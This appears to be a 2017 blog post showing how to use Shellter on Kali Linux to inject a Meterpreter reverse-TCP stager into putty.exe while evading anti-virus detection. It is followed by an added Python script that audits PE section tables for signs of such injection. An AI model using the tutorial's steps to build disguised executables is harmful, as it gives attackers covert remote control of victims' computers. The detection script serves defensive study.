By: bytezealot
March 17, 2017

Need a FUD: What about Shellter?

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE (portable executable) infector ever created. It can be used to inject shellcode into native 32-bit Windows applications. It takes advantage of the original structure of the PE file and doesn't apply modifications that would look dodgy under an anti-virus scan, such as changing memory access permissions in sections (unless the user wants) or adding an extra section with RWE (Read Write Execute) access.

Please note that Kali Linux will be used during this demonstration.

INSTALLING SHELLTER:

IMPORTANT: "Wine" must be installed for Shellter to properly install and run.

First, use the following command to install Shellter:

    apt-get install shellter

USING SHELLTER:

To start using Shellter, just use the following command:

    shellter

Here you can choose 3 options (Automatic, Manual, Help). We will use "A" for Automatic.

It will then ask for the PE Target. In our case, we use /root/Desktop/putty.exe.

A backup file will be made in Shellter_Backups.

After that, we choose whether we want to use Stealth Mode. For the purpose of this example, we will choose "Y" for yes.

We then have 7 Payloads to choose from:

1. Meterpreter_reverse_TCP (stager)
2. Meterpreter_Reverse_HTTP (stager)
3. Meterpreter_Reverse_HTTPS (stager)
4. Meterpreter_Bind_TCP (stager)
5. Shell_Reverse_TCP (stager)
6. Shell_Bind_TCP (stager)
7. WinExec

If we want a payload in the list, we enter "L" for list. Then, we enter the number of the payload to use. In this example, we will use "1" for Meterpreter_reverse_TCP.

After that, we are asked to provide the following information:

LHOST: "192.168.1.7" (in my case)
LPORT: "443" Standard HTTP over SSL port.

We then wait a few seconds for the process to complete, and voilà, we have a payload injected into a regular program!

There is a lot more to know about Shellter, and you can easily find more features and take it much further!

Have fun playing with this incredible tool!

PS: Shellter Pro is on the verge of coming out so I encourage you to periodically check it out.

Best Regards!
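The modifications the opening paragraph lists as looking dodgy under an anti-virus scan (changed section permissions, an extra RWE section) are visible in the PE section table, so a defender can check a file for them against a trusted copy. This is an added example, not code from the original post or from the Shellter project: `sections`, `audit` and `build_pe` are hypothetical names, the sample files are constructed header-only images, and the per-section hash goes beyond the text to catch changes that leave the headers alone.

```python
import hashlib
import struct

EXEC, READ, WRITE = 0x20000000, 0x40000000, 0x80000000  # IMAGE_SCN_MEM_* bits

def sections(pe: bytes) -> dict:
    """Map section name -> (characteristics, SHA-256 of the section's raw data)."""
    nt = int.from_bytes(pe[0x3C:0x40], "little")         # e_lfanew
    if pe[:2] != b"MZ" or pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    count, opt = struct.unpack_from("<H12xH", pe, nt + 6)  # NumberOfSections, SizeOfOptionalHeader
    out = {}
    for hdr in range(nt + 24 + opt, nt + 24 + opt + 40 * count, 40):
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        size, ptr, flags = struct.unpack_from("<II12xI", pe, hdr + 16)  # raw size, raw offset, flags
        out[name] = (flags, hashlib.sha256(pe[ptr:ptr + size]).hexdigest())
    return out

def audit(known_good: bytes, suspect: bytes) -> list:
    """Compare a suspect file's section table with a trusted copy of the same file."""
    good, findings = sections(known_good), []
    for name, (flags, digest) in sections(suspect).items():
        if flags & WRITE and flags & EXEC:
            findings.append(f"{name}: writable and executable")
        if name not in good:
            findings.append(f"{name}: section added")
            continue
        if flags != good[name][0]:
            findings.append(f"{name}: permissions changed")
        if digest != good[name][1]:
            findings.append(f"{name}: content changed")
    return findings

def build_pe(secs) -> bytes:
    """Constructed, header-only PE for the demo: secs = [(name, flags, data)]."""
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 0, 0x102)
    raw, table, body = 0x40 + 24 + 40 * len(secs), b"", b""
    for name, flags, data in secs:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), 0x1000,
                             len(data), raw + len(body), 0, 0, 0, 0, flags)
        body += data
    return b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + coff + table + body

TEXT, DATA = EXEC | READ | 0x20, READ | WRITE | 0x40    # usual .text / .data flags
clean = build_pe([(".text", TEXT, b"\x90" * 16), (".data", DATA, b"\0" * 8)])
extra = build_pe([(".text", TEXT, b"\x90" * 16), (".data", DATA, b"\0" * 8),
                  (".new", EXEC | READ | WRITE, b"\xcc" * 8)])
patched = build_pe([(".text", TEXT, b"\x90" * 8 + b"\xcc" * 8), (".data", DATA, b"\0" * 8)])
print(audit(clean, clean), audit(clean, extra), audit(clean, patched))
```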